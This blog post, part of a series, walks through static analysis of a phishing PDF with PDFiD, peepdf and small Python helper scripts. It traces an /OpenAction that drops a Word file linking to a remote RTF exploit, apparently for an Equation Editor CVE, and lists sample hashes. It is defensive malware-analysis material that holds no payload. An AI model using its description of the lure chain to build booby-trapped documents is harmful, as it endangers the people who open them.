
Malicious document analysis Part-2

A basic and quick approach to analysing phishing documents to identify indicators of maliciousness. Refer to Part-1 to understand the tools and approach used to analyse Office Word documents. This post covers the static analysis of a PDF document to identify suspicious objects. (FYI: running the PDF in a sandbox environment can give much more insight into indicators of compromise.) This post doesn't cover complete, in-depth analysis of malicious documents (such as dealing with obfuscated malicious JavaScript or shellcode).

All document samples are pulled from Hybrid Analysis - a free malware analysis service for the community that detects and analyzes unknown threats using a unique Hybrid Analysis technology. 

To analyse PDF files, open them in a hex editor and look for the signs of a malicious PDF, such as automatic actions, the presence of JavaScript or Flash, and stream filters with known vulnerabilities (for example /JBIG2Decode).

/Page gives an indication of the number of pages in the PDF document. Most malicious PDF documents have only one page.
/JS and /JavaScript indicate that the PDF document contains JavaScript, and /RichMedia indicates embedded Flash. Most malicious PDF documents found in the wild contain JavaScript (to exploit a JavaScript vulnerability and/or to execute a heap spray). Of course, you can also find JavaScript in PDF documents without malicious intent. For example, government agencies are known to provide forms in PDF format with JavaScript to validate input.
/AA and /OpenAction indicate an automatic action to be performed when the page/document is viewed, and /AcroForm indicates an interactive form, which can also carry scripts. These are often used to execute JavaScript without user interaction.

PDFiD scans a PDF file for certain PDF keywords, so you can identify PDF documents that (for example) contain JavaScript or execute an action when opened. The presence or absence of these keywords will help you decide whether a PDF file is potentially malicious and requires further analysis, or whether it is benign and requires no analysis. The keywords PDFiD looks for are:

• endobj
• stream
• endstream
• xref
• trailer
• startxref
• /Page
• /Encrypt
• /ObjStm
• /JS
• /JavaScript
• /AA
• /OpenAction
• /AcroForm
• /JBIG2Decode
• /RichMedia
• /Colors with a value larger than 2^24

PDFiD will not look inside the compressed data of stream objects. You will need other tools to do this. The main purpose of PDFiD is to help you decide whether a PDF file requires further analysis or not (especially if it comes from an untrusted source).
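The keyword check described above can be approximated in a few lines of Python. This is only a rough sketch of the idea, not PDFiD itself: the function names are made up for illustration, the /Colors check is left out, and (like PDFiD) it does not look inside compressed streams. It also undoes #XX hex escapes in names, since a name such as /J#53 is just another spelling of /JS.

```python
import re
import sys

# Keywords taken from the list above; the /Colors check needs value parsing
# and is left out of this sketch.
KEYWORDS = [
    "endobj", "stream", "endstream", "xref", "trailer", "startxref",
    "/Page", "/Encrypt", "/ObjStm", "/JS", "/JavaScript", "/AA",
    "/OpenAction", "/AcroForm", "/JBIG2Decode", "/RichMedia",
]


def decode_hex_names(data: bytes) -> bytes:
    """Undo #XX escapes so /J#53 is counted as /JS (crude: applied file-wide)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def count_keywords(data: bytes) -> dict:
    """Count how often each keyword appears in the raw bytes of a PDF."""
    data = decode_hex_names(data)
    counts = {}
    for kw in KEYWORDS:
        pattern = re.escape(kw.encode("ascii"))
        if kw.startswith("/"):
            # A name must not continue with a letter or digit (/Page vs /Pages).
            pattern += rb"(?![A-Za-z0-9])"
        else:
            # Structural words must stand alone (xref vs startxref).
            pattern = rb"(?<![A-Za-z])" + pattern + rb"(?![A-Za-z])"
        counts[kw] = len(re.findall(pattern, data))
    return counts


if __name__ == "__main__" and len(sys.argv) > 1:
    with open(sys.argv[1], "rb") as fh:
        for keyword, count in count_keywords(fh.read()).items():
            print(f"{keyword:<14}{count}")
```

A non-zero count for /OpenAction together with /JS or /JavaScript is the kind of combination that justifies a closer look at the individual objects.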

Check the file properties and integrity of the PDF sample.
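If no dedicated tool is at hand, a minimal Python sketch can do the same basic checks: it computes the SHA-256 hash (useful for reputation lookups) and confirms that the sample has a %PDF- header and an %%EOF marker near the end. The function name and the returned field names are assumptions made for this illustration.

```python
import hashlib
import sys


def pdf_properties(data: bytes) -> dict:
    """Return basic properties of a PDF sample given its raw bytes."""
    header_pos = data.find(b"%PDF-")
    version = None
    if header_pos >= 0:
        # The version follows the header marker, e.g. %PDF-1.7
        version = data[header_pos + 5:header_pos + 8].decode("latin-1")
    return {
        "size": len(data),
        "sha256": hashlib.sha256(data).hexdigest(),
        "header_offset": header_pos,   # -1 means no %PDF- header was found
        "version": version,
        "has_eof_marker": b"%%EOF" in data[-1024:],
    }


if __name__ == "__main__" and len(sys.argv) > 1:
    with open(sys.argv[1], "rb") as fh:
        for key, value in pdf_properties(fh.read()).items():
            print(f"{key}: {value}")
```

A header offset greater than zero, or a missing %%EOF marker, does not prove anything on its own, but both are worth noting before going further.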

Run PDFiD to identify suspicious indirect objects.
It identified /JS, /JavaScript and an /EmbeddedFile along with an /OpenAction, which means an action will be performed once the PDF is opened.

Next, search for the indirect objects that reference JavaScript.
The search showed that a document, dew008.docx, will be launched once the PDF is opened (the other indirect objects were analysed as well). A command-line parser can do a lot of good stuff here, but peepdf is preferred here to show and extract streams in their native format.

peepdf is an interactive tool for working with individual indirect objects and streams, and it can dump streams by redirecting the output. It can also check the reputation of the PDF file on VirusTotal, which gives an initial impression of the nature of the file. Interactive mode is selected with the -i option and lets you look at, decode and analyse streams.

The help option in interactive mode lists the documented commands.

object <object_number> shows information about the given object.

Observe stream 5 and stream 8 (the earlier output already showed that objects 5 and 8 contain streams). Stream 8 starts with the PK file header, that is, a ZIP container, and it was found to be an Office Word document.
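Recognising a dumped stream by its first bytes can be sketched as below. The signature table is a small, hand-picked assumption covering only the formats that come up in this kind of analysis; the file command knows far more. The RTF entry matches on {\rt rather than {\rtf because Word is tolerant of the shortened header, which malicious RTF files often use.

```python
# (magic bytes, description) pairs; a short illustrative table, not exhaustive.
SIGNATURES = [
    (b"PK\x03\x04", "ZIP container (e.g. Office Open XML .docx)"),
    (b"{\\rt", "RTF document"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "OLE2 compound file (legacy .doc/.xls)"),
    (b"%PDF-", "PDF document"),
    (b"MZ", "Windows executable"),
]


def identify(data: bytes) -> str:
    """Return a description of the data based on its leading magic bytes."""
    for magic, description in SIGNATURES:
        if data.startswith(magic):
            return description
    return "unknown"
```

For example, identify(open("stream8.bin", "rb").read()) would report a ZIP container for a dumped .docx, where stream8.bin is a hypothetical file name for the dumped stream.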

Stream 8 was dumped, and its metadata and file properties were checked using the file command. The hash value can be checked on VirusTotal, or the document can be run in a sandbox environment to get more insight, but this analysis is all about analysing the document without running it in a sandbox.

The dumped Word file was unzipped to look for external relationships. It contains one of type oleObject, and its target is an RTF file.
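The same relationship check can be done without unzipping to disk. The sketch below, with a function name chosen only for this example, reads every .rels part inside the .docx and reports relationships marked TargetMode="External". It relies on the standard library XML parser for brevity; for untrusted samples a hardened parser may be the safer choice.

```python
import io
import xml.etree.ElementTree as ET
import zipfile

# Namespace used by relationship parts in Office Open XML packages.
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def external_relationships(docx_bytes: bytes) -> list:
    """Return (part name, relationship type, target) for each external relationship."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") == "External":
                    # Keep only the last path segment of the type URI, e.g. oleObject.
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((name, rel_type, rel.get("Target")))
    return found
```

An external target of type oleObject that points to a remote URL is the pattern seen in this sample: the document itself carries no exploit and simply pulls the next stage when opened.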

Wow! wget it and analyse 

It was up luckily :) 
ptceg.doc was downloaded and its file properties were checked.
Cool! It was found to be RTF! CVE-2017-11882?? Let's run rtfobj.

Probably CVE-2018-0802, a later Equation Editor vulnerability that followed CVE-2017-11882.

Further analysis needs to be done!

93fc24573bd563f08b3a6a71276bfe085488d3bbb8d79bbbc3a75e5c0497e915  STN-ORDER4487599.pdf
2ce1f20a6909cfa1722ef3d5e4302ff8a8457f082c0ea2016b2e2ffd831af46f  ptceg.doc (RTF)

13ce56581c8ad851fc44ad6c6789829e7c250b2c8af465c4a163b9a28c9b8a41  lhvazm.doc (RTF) 

